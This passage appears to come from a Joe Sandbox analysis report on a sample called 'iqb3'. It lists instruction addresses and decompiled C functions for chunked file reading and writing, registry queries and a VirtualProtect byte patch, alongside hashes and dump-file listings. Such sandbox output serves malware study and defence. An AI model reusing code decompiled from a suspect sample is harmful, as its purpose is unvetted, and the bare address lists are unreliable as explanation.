                                                                      0x00406531
                                                                      0x00406534
                                                                      0x00406537
                                                                      0x0040653a
                                                                      0x0040653a
                                                                      0x0040653d
                                                                      0x00406541
                                                                      0x00406543
                                                                      0x0040651b
                                                                      0x0040651b
                                                                      0x00406523
                                                                      0x00406528
                                                                      0x0040652a
                                                                      0x0040652c
                                                                      0x0040652c
                                                                      0x00406546
                                                                      0x0040654d
                                                                      0x00406550
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x004067df
                                                                      0x004067df
                                                                      0x004067e3
                                                                      0x00406b0a
                                                                      0x00000000
                                                                      0x00406b0a
                                                                      0x004067e9
                                                                      0x004067ec
                                                                      0x004067ef
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x004067fc
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x00406801
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065af
                                                                      0x004065af
                                                                      0x004065b2
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x004068ee
                                                                      0x004068f2
                                                                      0x00406914
                                                                      0x00406917
                                                                      0x00406921
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x004068f4
                                                                      0x004068f7
                                                                      0x004068fb
                                                                      0x004068fe
                                                                      0x004068fe
                                                                      0x00406901
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069ab
                                                                      0x004069af
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069d4
                                                                      0x004069db
                                                                      0x004069e2
                                                                      0x004069e2
                                                                      0x00000000
                                                                      0x004069e2
                                                                      0x004069b1
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069c1
                                                                      0x00406905
                                                                      0x00406905
                                                                      0x00406908
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a9c
                                                                      0x00406a9f
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066d6
                                                                      0x004066d8
                                                                      0x004066df
                                                                      0x004066e0
                                                                      0x004066e2
                                                                      0x004066e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066ed
                                                                      0x004066f0
                                                                      0x004066f3
                                                                      0x004066f5
                                                                      0x004066f7
                                                                      0x004066f7
                                                                      0x004066f8
                                                                      0x004066fb
                                                                      0x00406702
                                                                      0x00406705
                                                                      0x00406713
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e9
                                                                      0x004069e9
                                                                      0x004069ec
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069f8
                                                                      0x004069f8
                                                                      0x004069fc
                                                                      0x00406b34
                                                                      0x00000000
                                                                      0x00406b34
                                                                      0x00406a02
                                                                      0x00406a05
                                                                      0x00406a08
                                                                      0x00406a0c
                                                                      0x00406a0f
                                                                      0x00406a15
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a1a
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a20
                                                                      0x00406a20
                                                                      0x00406a24
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8c
                                                                      0x00406a8d
                                                                      0x00406a8f
                                                                      0x00406a91
                                                                      0x00406a94
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x004069a6
                                                                      0x004069a0
                                                                      0x00406a26
                                                                      0x00406a2c
                                                                      0x00406a2f
                                                                      0x00406a32
                                                                      0x00406a35
                                                                      0x00406a38
                                                                      0x00406a3b
                                                                      0x00406a3e
                                                                      0x00406a41
                                                                      0x00406a44
                                                                      0x00406a47
                                                                      0x00406a60
                                                                      0x00406a63
                                                                      0x00406a66
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x00406a6f
                                                                      0x00406a6f
                                                                      0x00406a70
                                                                      0x00406a73
                                                                      0x00406a49
                                                                      0x00406a49
                                                                      0x00406a51
                                                                      0x00406a56
                                                                      0x00406a58
                                                                      0x00406a5b
                                                                      0x00406a5b
                                                                      0x00406a76
                                                                      0x00406a7d
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x0040671b
                                                                      0x0040671e
                                                                      0x00406754
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406887
                                                                      0x00406887
                                                                      0x0040688a
                                                                      0x0040688c
                                                                      0x00406b16
                                                                      0x00000000
                                                                      0x00406b16
                                                                      0x00406892
                                                                      0x00406895
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040689b
                                                                      0x0040689f
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x00000000
                                                                      0x004068a2
                                                                      0x00406720
                                                                      0x00406722
                                                                      0x00406724
                                                                      0x00406726
                                                                      0x00406729
                                                                      0x0040672a
                                                                      0x0040672c
                                                                      0x0040672e
                                                                      0x00406731
                                                                      0x00406734
                                                                      0x0040674a
                                                                      0x0040674f
                                                                      0x00406787
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x004067b7
                                                                      0x004067b9
                                                                      0x004067c0
                                                                      0x004067c3
                                                                      0x004067c6
                                                                      0x004067c6
                                                                      0x004067cb
                                                                      0x004067cb
                                                                      0x004067cd
                                                                      0x004067d0
                                                                      0x004067d7
                                                                      0x004067da
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x0040680a
                                                                      0x0040680d
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00000000
                                                                      0x00406881
                                                                      0x0040680f
                                                                      0x00406815
                                                                      0x00406818
                                                                      0x0040681b
                                                                      0x0040681e
                                                                      0x00406821
                                                                      0x00406824
                                                                      0x00406827
                                                                      0x0040682a
                                                                      0x0040682d
                                                                      0x00406830
                                                                      0x00406849
                                                                      0x0040684b
                                                                      0x0040684e
                                                                      0x0040684f
                                                                      0x00406852
                                                                      0x00406854
                                                                      0x00406857
                                                                      0x00406859
                                                                      0x0040685b
                                                                      0x0040685e
                                                                      0x00406860
                                                                      0x00406863
                                                                      0x00406867
                                                                      0x00406869
                                                                      0x00406869
                                                                      0x0040686a
                                                                      0x0040686d
                                                                      0x00406870
                                                                      0x00406832
                                                                      0x00406832
                                                                      0x0040683a
                                                                      0x0040683f
                                                                      0x00406841
                                                                      0x00406844
                                                                      0x00406844
                                                                      0x00406873
                                                                      0x0040687a
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x0040687a
                                                                      0x0040678d
                                                                      0x00406790
                                                                      0x00406792
                                                                      0x00406795
                                                                      0x00406798
                                                                      0x0040679b
                                                                      0x0040679d
                                                                      0x004067a0
                                                                      0x004067a3
                                                                      0x004067a3
                                                                      0x004067a6
                                                                      0x004067a6
                                                                      0x004067a9
                                                                      0x004067b0
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x004067b0
                                                                      0x00406736
                                                                      0x00406739
                                                                      0x0040673b
                                                                      0x0040673e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040649d
                                                                      0x0040649d
                                                                      0x004064a1
                                                                      0x00406ae6
                                                                      0x00000000
                                                                      0x00406ae6
                                                                      0x004064a7
                                                                      0x004064aa
                                                                      0x004064ad
                                                                      0x004064b0
                                                                      0x004064b3
                                                                      0x004064b6
                                                                      0x004064b9
                                                                      0x004064bb
                                                                      0x004064be
                                                                      0x004064c1
                                                                      0x004064c4
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406628
                                                                      0x00406628
                                                                      0x0040662c
                                                                      0x00406af2
                                                                      0x00000000
                                                                      0x00406af2
                                                                      0x00406632
                                                                      0x00406635
                                                                      0x00406638
                                                                      0x0040663b
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x00406640
                                                                      0x00406643
                                                                      0x00406646
                                                                      0x00406649
                                                                      0x0040664c
                                                                      0x0040664f
                                                                      0x00406650
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406655
                                                                      0x00406658
                                                                      0x0040665b
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x00406661
                                                                      0x00406663
                                                                      0x00406663
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068af
                                                                      0x004068b2
                                                                      0x004068b5
                                                                      0x004068b8
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068c0
                                                                      0x004068c3
                                                                      0x004068c6
                                                                      0x004068c9
                                                                      0x004068cc
                                                                      0x004068cd
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068d2
                                                                      0x004068d5
                                                                      0x004068d8
                                                                      0x004068db
                                                                      0x004068de
                                                                      0x004068e2
                                                                      0x004068e4
                                                                      0x004068e7
                                                                      0x00000000
                                                                      0x004068e9
                                                                      0x00406666
                                                                      0x00406666
                                                                      0x00000000
                                                                      0x00406666
                                                                      0x004068e7
                                                                      0x00406b1c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x004069a0
                                                                      0x00406927
                                                                      0x00406924

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1ead19a7d6b18f14945d6ecc7a756aa80631c696357f52aa6e4b7da038a1b463
                                                                      • Instruction ID: a58d0c8a3e5e471a1862abd912d582b465d9d5205f6115614135299ff5c3e34f
                                                                      • Opcode Fuzzy Hash: 1ead19a7d6b18f14945d6ecc7a756aa80631c696357f52aa6e4b7da038a1b463
                                                                      • Instruction Fuzzy Hash: F9714771E00229CBDF28CF98C8447ADBBB1FF44305F15806AD816BB281D7789956DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402F1F Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E00402F1F(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				long _t28;
				intOrPtr _t29;
				void* _t31;
				long _t32;
				int _t33;
				long _t34;
				void* _t35;
				int _t37;
				long _t38;
				long _t39;
				long _t46;

				_t28 = _a4;
				if(_t28 >= 0) {
					_t39 = _t28 +  *0x423738;
					 *0x41688c = _t39;
					SetFilePointer( *0x40901c, _t39, 0, 0); // executed
				}
				_t29 = E0040303A(4);
				if(_t29 >= 0) {
					_t31 = E004059E7( *0x40901c,  &_a4, 4); // executed
					if(_t31 == 0) {
						L19:
						_push(0xfffffffd);
						goto L20;
					} else {
						 *0x41688c =  *0x41688c + 4;
						_t29 = E0040303A(_a4);
						_v12 = _t29;
						if(_t29 >= 0) {
							if(_a12 != 0) {
								_t32 = _a4;
								if(_t32 >= _a16) {
									_t32 = _a16;
								}
								_t33 = ReadFile( *0x40901c, _a12, _t32,  &_v8, 0); // executed
								if(_t33 != 0) {
									_t34 = _v8;
									 *0x41688c =  *0x41688c + _t34;
									_v12 = _t34;
									goto L22;
								} else {
									goto L19;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t29 = _v12;
								} else {
									while(1) {
										_t46 = _a4;
										if(_a4 >= 0x4000) {
											_t46 = 0x4000;
										}
										_v8 = _t46;
										_t35 = E004059E7( *0x40901c, 0x412888, _t46); // executed
										if(_t35 == 0) {
											goto L19;
										}
										_t37 = WriteFile(_a8, 0x412888, _v8,  &_a16, 0); // executed
										if(_t37 == 0 || _a16 != _t46) {
											_push(0xfffffffe);
											L20:
											_pop(_t29);
										} else {
											_t38 = _v8;
											_v12 = _v12 + _t38;
											_a4 = _a4 - _t38;
											 *0x41688c =  *0x41688c + _t38;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L23;
									}
									goto L19;
								}
							}
						}
					}
				}
				L23:
				return _t29;
			}
















                                                                      0x00402f24
                                                                      0x00402f2d
                                                                      0x00402f36
                                                                      0x00402f3a
                                                                      0x00402f45
                                                                      0x00402f45
                                                                      0x00402f4d
                                                                      0x00402f54
                                                                      0x00402f66
                                                                      0x00402f6d
                                                                      0x00403020
                                                                      0x00403020
                                                                      0x00000000
                                                                      0x00402f73
                                                                      0x00402f76
                                                                      0x00402f7d
                                                                      0x00402f84
                                                                      0x00402f87
                                                                      0x00402f90
                                                                      0x00402ffc
                                                                      0x00403002
                                                                      0x00403004
                                                                      0x00403004
                                                                      0x00403016
                                                                      0x0040301e
                                                                      0x00403025
                                                                      0x00403028
                                                                      0x0040302e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402f92
                                                                      0x00402f95
                                                                      0x00403031
                                                                      0x00403031
                                                                      0x00402f9b
                                                                      0x00402fa0
                                                                      0x00402fa7
                                                                      0x00402faa
                                                                      0x00402fac
                                                                      0x00402fac
                                                                      0x00402fb9
                                                                      0x00402fbc
                                                                      0x00402fc3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402fd2
                                                                      0x00402fda
                                                                      0x00402ff8
                                                                      0x00403022
                                                                      0x00403022
                                                                      0x00402fe1
                                                                      0x00402fe1
                                                                      0x00402fe4
                                                                      0x00402fe7
                                                                      0x00402fea
                                                                      0x00402ff4
                                                                      0x00000000
                                                                      0x00402ff6
                                                                      0x00000000
                                                                      0x00402ff6
                                                                      0x00402ff4
                                                                      0x00000000
                                                                      0x00402fda
                                                                      0x00000000
                                                                      0x00402fa0
                                                                      0x00402f95
                                                                      0x00402f90
                                                                      0x00402f87
                                                                      0x00402f6d
                                                                      0x00403034
                                                                      0x00403037

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                                                      • WriteFile.KERNELBASE(00000000,00412888,?,000000FF,00000000,00412888,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: File$PointerWrite
                                                                      • String ID:
                                                                      • API String ID: 539440098-0
                                                                      • Opcode ID: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                                      • Instruction ID: e6de339a950e3072e6bd285c0139ce9fe6f591fe0572f4373a504b9c05a9d2ef
                                                                      • Opcode Fuzzy Hash: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                                      • Instruction Fuzzy Hash: 42316970502259EBDF20DF55ED44A9E3BBCEB003A5F20803AF904E61D0D374DA40EBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405BC5 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 88%
                                                                      			E00405BC5(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x400;
					if(RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8) != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					return RegCloseKey(_a20);
				}
				return _t20;
			}





                                                                      0x00405bd5
                                                                      0x00405bd7
                                                                      0x00405be4
                                                                      0x00405bee
                                                                      0x00405bf6
                                                                      0x00405bfb
                                                                      0x00405c17
                                                                      0x00405c25
                                                                      0x00405c25
                                                                      0x00405c2a
                                                                      0x00000000
                                                                      0x00405c30
                                                                      0x00405c39

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,00405E0A,00000000,00000002,?,00000002,?,?,00405E0A,80000002,Software\Microsoft\Windows\CurrentVersion,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?), ref: 00405BEE
                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00405E0A,?,00405E0A), ref: 00405C0F
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00405C30
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                      • Instruction ID: 047f747c479f1ba90910982628ff2a27228e60a50e2c11dba67ada3cfd0a07d9
                                                                      • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                      • Instruction Fuzzy Hash: D0015A7154424EEFEB228F64EC44AEB3FACEF14358F004436F905A6220D235D964CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004059E7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004059E7(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                      0x004059eb
                                                                      0x004059fb
                                                                      0x00405a03
                                                                      0x00000000
                                                                      0x00405a0a
                                                                      0x00000000
                                                                      0x00405a0c

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00412888,090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000,004031C9,00409130,00409130,004030BB,00412888,00004000,?,00000000,?), ref: 004059FB
                                                                      Strings
                                                                      • 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000, xrefs: 004059E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000
                                                                      • API String ID: 2738559852-2221801228
                                                                      • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                                      • Instruction ID: 267b57ffcffc4b39201858a503e5f4d445fc1ddc2041b1288b81c8d36a0eb731
                                                                      • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                                      • Instruction Fuzzy Hash: E6E0E632754199AFDF209E559C44EEB775CEB05350F004532FA15F3150D631E9219FA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 10002724 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004058 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x10004050 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}



                                                                      0x1000272d
                                                                      0x10002732
                                                                      0x10002742
                                                                      0x1000274a
                                                                      0x10002751
                                                                      0x10002756
                                                                      0x1000275b
                                                                      0x10002760
                                                                      0x10002765
                                                                      0x1000276a
                                                                      0x1000276f
                                                                      0x1000276f
                                                                      0x10002777

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002742
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.757682389.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.757659819.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757713257.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757732274.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID: `get@Met
                                                                      • API String ID: 544645111-50837814
                                                                      • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                      • Instruction ID: 652332ac7bde672dc05c446cd50b76b12c9e61f3b08479d0be882dc895827dde
                                                                      • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                      • Instruction Fuzzy Hash: A3F09BF19092A0DEF360DF688CC47063FE4E3983D6B03852AE358F6269EB3441448B19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004023C8 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E004023C8(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402B07(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E004029FD(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x30) = 0x400;
					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x30) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x14) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x14) == __ebx;
							E00405C3C(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x14);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x423768 =  *0x423768 +  *(_t37 - 4);
				return 0;
			}








                                                                      0x004023c8
                                                                      0x004023c8
                                                                      0x004023cd
                                                                      0x004023d4
                                                                      0x004023d6
                                                                      0x004023dd
                                                                      0x004023df
                                                                      0x00402663
                                                                      0x004023e5
                                                                      0x004023e8
                                                                      0x00402403
                                                                      0x00402433
                                                                      0x00402433
                                                                      0x00402435
                                                                      0x00402405
                                                                      0x00402409
                                                                      0x00402422
                                                                      0x00402429
                                                                      0x0040242c
                                                                      0x0040240b
                                                                      0x0040240e
                                                                      0x00402419
                                                                      0x00402489
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040240e
                                                                      0x00402409
                                                                      0x0040248f
                                                                      0x00402490
                                                                      0x00402490
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                        • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
                                                                      • RegCloseKey.ADVAPI32(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
